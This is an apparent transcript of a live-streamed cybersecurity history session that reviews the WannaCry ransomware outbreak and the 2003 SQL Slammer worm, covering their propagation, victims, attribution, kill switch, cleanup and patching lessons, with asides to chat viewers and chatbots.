Okay, so those are the primary methods through which the WannaCry ransomware attack propagated itself. So let's fill that in. So how was the target initially compromised? The targets were initially compromised through the Eternal Blue exploit, which attacked systems through the SMB protocol. Specifically, the 1.0 version of the protocol. Okay. Were other hacking methods employed? Well, we saw that the double pulsar backdoor, also developed by the NSA, was used as a persistence method. Okay. All right, so the next question is, what was the impact of the hack? So there were a lot of soft targets targeted by this particular attack. So let's ask the question. Who were some of the better known targets of the WannaCry ransomware attack? Okay, send this. So this is the so the most notable target of the WannaCry ransomware attack was the National Health Service, the NHS, in the United Kingdom. So because the NHS is their network was infected and locked down by the WannaCry ransomware attack, and because they deal in healthcare and all the systems associated with hospitals were also affected. This is probably the most famous target of the WannaCry ransomware attack. So, but some other targets included, okay, FedEx and Deutsche Bahn and Renault, Nissan, Chinese universities, Russian Interior Ministry, Hitachi, okay, the banking sectors. But most famously, it was the NHS, the National Health Service. All right, so over here. So systems all over the world, but most notably, the network of the British National Health Service were affected and caused these organizations to experience loss of productivity. I guess that's kind of putting it lightly. Okay, so the question is another question that I really want to know is how many users were affected by this attack. So what is the estimated number of infections for this, for the WannaCry attack? Okay, so according to Claude, total infections, most estimates place the number of affected computers between 20,000, 200,000, and 300,000 worldwide. Let's see, ChatGPT says ransomware attack is estimated to have infected around 230,000 computers in over 150 countries. So this sounds more accurate to me. But we've got some more information from Claude over here. So Europol estimates that the attack affected more than 200,000 computers in at least 150 countries. Cybersecurity firm Kaspersky Lab reported detecting about 45,000 attacks in 74 countries within the first few hours of the outbreak. Okay, so I'm going to copy this answer. Estimates are that it affected more than... Okay, so we got that information from ChatGPT. So was the hacker identified? How confident are we of attribution? So this is an interesting thing. The common story in this case is that WannaCry was created by the North Korean government or by threat actors within North Korea. If we go over to the Wikipedia article and we go over to the attribution section. So let's give this a read. The linguistic analysis of the ransom notes indicate that the authors were likely fluent in Chinese and proficient in English, as the versions of these notes in those languages were probably human written, while the rest seemed to be machine translated. According to the analysis by FBI's Cyber Behavioral Analysis Center, the computer that created the ransomware language files had Hangul language fonts installed, as evidenced by the presence of the /f charset 129 rich text format tag. Metadata in the language files also indicated that the computers that created the ransomware were set to UTC plus 0900, which is used in Korea. Okay, so most of the security researchers came to the conclusion that it was probably created in North Korea. So the cybersecurity companies Kaspersky Lab and Symantec have both said that the code has similarities with that previously used by the Lazarus Group, believed to have carried out the cyber attack on Sony Pictures in 2014 and a Bangladesh bank heist in 2016 linked to North Korea. So the Bangladesh bank heist is another legendary hack that actually received a lot of coverage from a bunch of different cybersecurity related podcasts. So if you have some time, please do. If you want to learn about some cybersecurity history, you should learn about the Bangladesh bank heist in 2016, which was also attributed to the same group as this hack, which is called the Lazarus Group. Okay, so let's go back. Was the hacker identified? Attribution was laid to the North Korean Lazarus hacker group. Okay, and how confident are we of this attribution? So let's ask the chatbots about how confident we can be of this attribution. How confident are we of attribution? Are we of the attribution to North Korea in relation to the WannaCry ransomware attack? Okay, send this. Oh, this... Let me change the music. Okay, and then we get a response, and let's take a look at the response. So the attribution of WannaCry ransomware to North Korea is considered to be highly confident by several major cybersecurity organizations and government agencies. Here are some key points. So Lazarus Group, hacking organization believed to be linked to North Korea, has been identified as being behind the WannaCry attack. Code similarities. So cybersecurity firms, this is also a little too strange. Okay. So code similarities, IP addresses, infrastructure also point to the Lazarus Group. Government statements publicly attributed the WannaCry attack to North Korea. This was further supported by statements from the UK's National Cyber Security Centre and other allied nations. Okay, so we can say that due to many different factors that we can be highly confident about the attribution for this particular case. So we are highly confident to the attribution of this group. Okay, was the hacker punished? In this case, I don't think anybody was punished. So that's kind of a sad reality, that unless you're able to apprehend the actual hackers, you're not going to be able to get any sort of justice for this. So we've got our impact over here, and we've got our affected organizations. There's a lot of them. So here's an interesting thing. So a number of experts highlighted the NSA's non-disclosure of the underlying vulnerability and their loss of control over the Eternal Blue attack tool that exploited it. Edward Snowden said that the NSA had privately disclosed the flaw used to attack hospitals when they found it. If the NSA had privately disclosed the flaw used to attack hospitals when they found it, not when they lost it, the attack may not have happened. Okay, so we'll talk more about this in a little bit. Okay, so let's ask the question: Were the authors of the WannaCry ransomware punished for this attack? So the answer is no. So the individuals and entities directly responsible for creating and deploying the WannaCry ransomware have not been publicly apprehended or punished. There have been significant actions and statements from various governments and organizations regarding the attribution and consequences for the attack. In short, the answer is no. They were not caught and they were not punished. But the U.S. Department of Justice identified a North Korean programmer, Park Jin-hyuk, for his alleged involvement in the WannaCry attack, as well as other cybercrimes, including the 2014 Sony Pictures hack. This indictment was largely symbolic. Park is believed to be in North Korea and unlikely to face trial in the US. Okay, so the answer is no. The hacker was not punished. What is this hacker doing now? So the answer, to just answer the question very quickly, we don't know what this hacker is doing now. They did engage in other known hacks. So it is believed that the Lazarus Group was also involved in the Sony Pictures hack of 2014. All right, so that was another really big hack. So what was the response to this hack? The response to this hack, well, okay, let's get into how this particular ransomware attack was resolved. So over at Wikipedia, so this is what happened. So researcher Marcus Hutchins discovered the kill switch domain hard-coded in the malware, and registering a domain name for a DNS sinkhole stopped the attack spreading as a worm, because the ransomware only encrypted the computer files if it was unable to contact that domain, which all computers infected with WannaCry before the website's registration had been unable to do so. While this did not help the already infected systems, it severely slowed the spread of initial infection and gave time for defensive measures to be deployed worldwide, particularly in North America and Asia. So this researcher, Marcus Hutchins, who became famous, by the way, after discovering this kill switch domain hard-coded in this malware, the attack effectively stopped because the malware was designed so that it wouldn't infect the systems, and it wouldn't spread if a particular domain was available for it to contact. So because it was able to contact this domain after the researcher registered the domain, the attack effectively stopped. It stopped spreading. So what was the question? The question was, what was the response to this hack? So the researcher, Marcus Hutchins, also known as Malware Tech, discovered the kill switch to the malware and deployed it, stopping the spread of the attack. Okay, so the interesting thing is that Marcus Hutchins became kind of a celebrity after he stopped this attack, and I think, well, he has a YouTube channel, and if you go over to YouTube and you search for Malware Tech, you can see that he has a YouTube channel over here, and I'll leave the link for his YouTube channel in the chat. And let's see, coming back. So a decryptor was created for the malware. Let's figure out. Okay, so I want to know so a decryptor was made for this particular malware, and let's find out how soon it was. So when this particular malware was cured. Is cured the way? Resolved. Okay. How quickly was a decryptor created for the WannaCry malware? Okay, in this case, the development of a decryptor for the WannaCry ransomware was a complex process, and it's important to note that a universal decryptor that could easily unlock all affected files was not quickly created. However, there were several developments and partial solutions that emerged in the days and weeks following the attack. Okay. So a partial solution was created after the first week. Within the first week, some researchers developed methods to recover data in specific scenarios. So they created the WannaKiwi tool. French researchers developed a tool called WannaKiwi that could recover the encryption keys in some cases, but only if the affected computer had not been rebooted and if certain conditions were met. And there's another tool called WannaKey, developed around the same time, that worked on the same similar principles to WannaKiwi. Okay. So a decryptor was created for the malware after about a week of research. However, it was not an easy fix. And I got this one from Claude. Okay, so what makes this hack famous? Okay, so what makes this hack famous? Well, the attack used a stolen exploit, stolen from the NSA, and that was Eternal Blue. What else made this hack famous? It demonstrated the fact that the NSA was hoarding exploits. Is that how you spell hoarding? Was hoarding exploits to use to attack enemies instead of contacting the publishers of vulnerable software to help secure the software from attacks. Okay, so what else makes the hack famous? Let's ask. What makes the WannaCry attack famous? And Ronin says, North Korea stole the Eternal Blue as well. Eternal Blue was not stolen. Well, North Korea didn't. Eternal Blue was stolen, but North Korea didn't steal it. North Korea used Eternal Blue, which was distributed by the shadow brokers, and the shadow brokers were a group of kind of shadowy hackers that claimed to have stolen these exploits from the NSA. So if you take a look at the article for Eternal Blue, so it's a computer exploit software developed by the NSA, and it was based on a vulnerability in Microsoft Windows. It was stolen by a group of hackers known as the Shadow Brokers. So the Shadow Brokers stole this Eternal Blue exploit from the NSA, and then they wanted to sell all of the hacking tools that they got from the NSA for like $1 million or something, a bunch of Bitcoin. But after nobody took them up on their offer to buy the exploits, they released a bunch of exploits to the public before going dark. And Eternal Blue was one of these exploits that they leaked. And then the North Koreans, well, allegedly, the North Koreans took Eternal Blue and they incorporated it into their WannaCry malware. So that's how that goes. So over here, so what makes the WannaCry attack famous? Widespread impact. It infected over 230,000 computers in more than 150 countries within a very short span of time. So the WannaCry attack basically happened over about 7 or 8 hours before, and it would have affected a lot more had the security researcher not found the kill switch. So it had high-profile victims. So it attacked numerous high-profile organizations, including the UK's NHS service. Exploit of a critical vulnerability. So it used Eternal Blue exploit in its as part of it, and it also attacked unpatched systems. So the unpatched systems portion really demonstrates the fact that you have to apply security updates as soon as possible. Otherwise, really bad things could happen to your unpatched systems. So this was also a self-propagating worm because WannaCry had worm-like capabilities because it was able to Eternal Blue is a really nasty exploit because generally if you use Eternal Blue on a Windows system, you have system access, system level access, which means your root, you're basically the highest level of user if you use the exploit, and through that they're able to execute whatever instructions they wanted to on the affected machine and propagate it by sending this attack to whatever other machines were connected on the network. Okay, so use of worm-like propagation. Did I? Looks like I need to start up my music again. Just a second. Let's go for meditation. Okay, much. That's nice. Okay. All right, and one more. Unpatched systems. So that's a really big thing. So it showed the importance of applying security patches to systems as soon as possible, and it also showed the importance of creating security patches for OS versions that have gone end of life. I guess the last thing we can say about why this was famous was because it affected a very soft target in the form of the NHS, including many hospitals. How do you spell hospital? Hospitals. Okay, lessons learned. I guess we can just say patch your stuff. And the NSA is not looking out for the security of software unless they've been the NSA is hoarding exploits to use on its enemies. Okay. All right, so we're going to save this, commit the changes, and I will supply this link to anybody who wants to take a look at it. And we're going to move on to our second target. The second target is probably not going to take as much time as this first target. We had a lot of stuff to say about this first target. But once again, if you want to learn about WannaCry, you can listen to this episode of Darknet Diaries. I highly recommend this. I also recommend the episode on shadow brokers, and the episode on the is there an episode on NSA? I'm not sure, but yeah, please, if you want to learn more, please listen to this episode. Marcus Hutchins is such a this story about Marcus Hutchins is also very interesting because Marcus Hutchins was arrested after going to DEF CON when he went to DEF CON to talk about this particular find of his. It's Ronan says the NSA will always have access to your PC. Well, I hope the NSA doesn't take too much offense to me talking about how they're hoarding exploits and how they're not interested in their top priority is not securing software against vulnerabilities. But yeah, okay. Let's move on to the Slammer worm. Okay, so we're talking about the SQL Slammer. This was a 2003 computer worm, so this is I actually don't know very much about the Slammer worm, so we're going to be learning some new stuff over here. So this is the Slammer worm. I'm going to start editing the file, and we're gonna find out what happened. So let's take a look. Close this out. So SQL Slammer is a 2003 computer worm that caused a denial of service on some internet hosts and dramatically generally slowed internet traffic. It also crashed routers around the world, causing even more slowdowns. It spread rapidly, infecting most of its 75,000 victims within 10 minutes. The program exploited a buffer overflow bug in Microsoft's SQL Server and Desktop Engine database products. Although the CVE patch had been released 6 months earlier, many organizations had not yet applied it. The most infected regions were Europe, North America, and Asia, so this is another case of a computer worm that affected unpatched systems. So this particular piece of malware incorporated known exploits and applied them in a way that took advantage of unpatched systems. So let me just copy verbatim this over here, and this is what happened. Okay, when was the hack discovered? I get the feeling that the hack was discovered very quickly, but let's take a look at the article. This music is too funky for me. Hold on. The worm was made possible by a software security vulnerability in SQL Server, first reported by Microsoft on 24th of July. The patch had been available from Microsoft for 6 months prior to the worm's launch, but many installations had not been patched, including many at Microsoft. The worm began to be noticed early on 25th of January 2003. Okay, so let's keep this in mind. So I'm going to say attack launched. And then the slowdown was caused by the collapse of numerous routers under the burden of extremely high bombardment traffic from infected servers. Okay, so this was not only a worm, but also kind of a form of DDoS. So it caused, okay. Normally, when traffic is too high for routers to handle, the routers are supposed to delay or temporarily stop network traffic. Instead, some routers crashed, and the neighbor routers would notice that these routers had stopped and should not be contacted. That is, removed from the routing table. Routers started sending notices to this effect to other routers that they knew about. The flooding of the routing table updates notices caused some additional routers to fail, compounding the problem. Eventually, the crash routers' maintainers restarted them, causing them to announce their status, leading to another wave of routing table updates. Soon, a significant portion of the internet bandwidth was consumed by routers communicating with each other to update their routing tables, and ordinary data traffic slowed, or in some cases stopped altogether. Because the SQL Slammer worm was so small in size, sometimes it was able to get through when legitimate traffic was not. Okay, so what question were we answering again? So how was the attack discovered? Oh, it was discovered very quickly. Okay, so the attack was launched on January 25th, and let's take a look at the timestamps. Okay, so let's ask for the timeline. Let's ask for the timeline from our chatbot friends. What was the timeline for the SQL Slammer worm attack of 2003? Okay, so in July 2002, they created the patch, and the attack happened at UTC 5:30. The worm was first released. Excuse me, I've got to cough. Okay. Everybody can hear me? Okay, great. All right, so within 10 minutes, the worm infects approximately 75,000 victims. Within 15 minutes, the number of infected hosts doubles every 8.5 seconds. What? Okay. That's, so within... Okay, within I'm gonna keep track of this time. Attack is launched within 10 minutes. 75,000 systems are infected. So how long do we think the hackers were operating before the hack was discovered? Okay, so attackers crafted this this malware for let's see, approximately half a year after the vulnerability was disclosed and a patch was provided. Okay, so who was the target of the hack? Any systems running Microsoft SQL Server, or what was the other one? So is Microsoft SQL Server unpatched copy of Microsoft SQL Server resolution service listening on UDP port 1434? Desktop engine. What is this? Microsoft SQL Server data engine. Okay. So how was the target initially compromised? So the target was compromised through communication using UDP ports 1434. What was the impact? What other hacking methods were employed? Okay, so we can answer this question. What methods were employed in the SQL Slammer attack? Okay, so exploitation of a buffer overflow vulnerability. So buffer overflow vulnerabilities used to be way more common back in the day. So let's fill that in. A buffer overflow vulnerability was used. What was the impact of the hack? Okay, so the malware spread very quickly and it caused massive slowdown of the internet and crashes of the systems infected as well as routers. Let's take a look. Slowdown was caused by the collapse of numerous routers under the burden of extremely high bombardment traffic from infected servers. So the infected servers would try to communicate with the routers and the routers would be taken down. All right. So was the I really want to know, was the hacker identified? How was the hacker identified in this case? So I think okay. So we can no longer use ChatGPT because we've run out of data for ChatGPT in this case. So we're just going to ask Claude. So who was the author of the SQL Slammer worm? Were they ever caught? Okay. So the precise identity of the SQL Slammer worm's author has never ever been definitively established, and no one has been successfully prosecuted for creating and releasing this malware. Here's what we know about so there's no confirmed author, there's lack of attribution, there have been investigation challenges, speculations and rumors, nothing definitive, no arrests or prosecutions. The attack occurred in 2003 and the trail has likely gone cold, making it even more challenging to identify the perpetrators now. Okay, so this is not something we like to hear. So was the identified? No. Was the hacker punished? No. What's the hacker doing now? We don't know. What was the response to this hack? What was the response to this hack? I guess there was already a patch for this vulnerability, so I assume that the affected machines were patched, and then they weren't. Well, I mean, I guess they would need to clean the They would clean the malware off the system and then patch the system, and then they would be fine. So let's take a look at, so there's technical details. Okay, so there's no aftermath. There's no, so let's ask Claude, what was the aftermath of the SQL Slammer how was the situation resolved? Okay, the resolution involved a combination of immediate actions and long-term changes in cybersecurity practices. Okay, so the internet was disrupted, the financial sector was impacted, critical infrastructure was also impacted, air travel, network filtering. So ISPs and network administrators quickly implemented filters to block traffic on this particular port, and then the systems were patched, and many networks temporarily disconnected from the internet to prevent infection and conduct cleanup. Removal of infections, often by simply rebooting as the worm operated only in memory. Okay, so there was a very simple cleanup for this worm because the worm only operated in memory, so just rebooting was able to fix the problem. Okay. So let's go back. So filtering, filtering was imposed for network traffic on UDP ports. And then what else happened? Networks, systems were disconnected from the internet, and security patches were applied to affected systems. Okay, because the worm operated from computer memory, it was erased on reboot. Okay, so what makes this hack famous? Let's see, Ronan says you can use chat all to ask more LLMs. Chat all. Is this a function on this website right here? Chat all. Is that a different website? Or if, Ronan, if you have the link to this chat all service, go ahead and leave it in the chat, and I'll take a look at it. Otherwise, if you're talking about the direct chat, Okay, so let's keep on going. What makes this hack famous? The hacker was never caught. The disruption was widespread. The hacker was never caught. Oh, GitHub. Okay, chat all. All right. Let me take a look at that. So Ronan, I'm interested to know where you found this particular GitHub. Chat with all AI bots concurrently, discover the best. Okay. Interesting. Okay, so I'll take a look at this after the stream is done. But because we're almost, I think we're almost finished with the with this particular hacking history. Okay, the disruption was widespread. The hacker was never caught. What else? Oh, the malware operated in memory, which makes it this a touchless malware. And lesson learns: patch your stuff. Patch your stuff, and any big vulnerability could potentially be used as part of a bigger piece of malware if people fail to apply security patches to their systems. Okay, so that is it. Let me save this out. Commit changes. All right. Okay, so wow, that was time just flew by there. Okay, so we took a look at two other big hacks. Those being the WannaCry worm slash ransomware attack, and also the Slammer worm. So I think, you know what? I think Darknet Diaries might have. I'm just a big shill for Darknet Diaries. I'm gonna Slammer. So Slammer, okay. Okay, there's no episode for the Slammer worm here, but you know what? I could have sworn that I saw an episode on Darknet Diaries associated with this. Ronan says, not sure, but it's good when it works, but you need to register to almost every one of them to use them. Oh, that sounds like a big pain in the butt. Generally, I use three different LLMs. I use Gemini. Actually, I'll list them off right here. So, Bing Chat. So Bing Chat uses Copilot, so I use that, and I also use Gemini from Google. And this is also very nice. Ronan says you can also use DuckDuckGo AI. Oh, DuckDuckGo. I haven't heard that. I haven't heard that name in a long time. Let me check this out. Let's check this out. Anything that can be done without registering is good. Say hello to DuckDuckGo AI chat. Okay, sure. Oh, and you get to check. Try experimenting with each model. They will provide different responses. So we can choose which model to use. Okay, so let's choose. Let's choose Llama. I'm not sure. Oh wow, this is great. This is great. You can access this without registering, and you can choose which model. Yeah, this is great, Ronan. Thank you very much. I will really. I think I'll be using this in the future. I might not be using Chat All because it requires registration with all these different with all these different services, and that's kind of a pain. But this is great. Thank you. Okay, so everybody, we're going to be wrapping up the stream very soon, but please be back on, if you want more hacking fun, we're going to be back on Friday, where we're going to be taking a look at the hackmyvm.eu website. And we're also going to be, we're going to be doing a lot of hackmyvm.eu on Friday. We're going to be taking a look at the Venus CTF labs over there, and we're going to be taking a look at a couple of the VMs, Gift, which is not going to take very much time at all, and maybe one other one. I'm not too sure which one, but please, if you want more hacking fun, it's going to be this Friday, and it's going to be at 8 o'clock Pacific Standard Time. But let's see if we can find somebody to raid. We're always looking for new fun InfoSec streams. And let's see. We've got Hacks Hobgoblin. Let me take a look at what they're doing. Okay, they're doing live hacking and chat pilgrimage on Hack the Box. All right, so anybody who wants to do more Hack the Box with streamers, please join us in our raid and tell them that the Shy Hat sent you. Okay, so let's raid Hacks Hobgoblin. Thank you very much, and we will see you next time. But before we do this, let's go out with some hack all the things.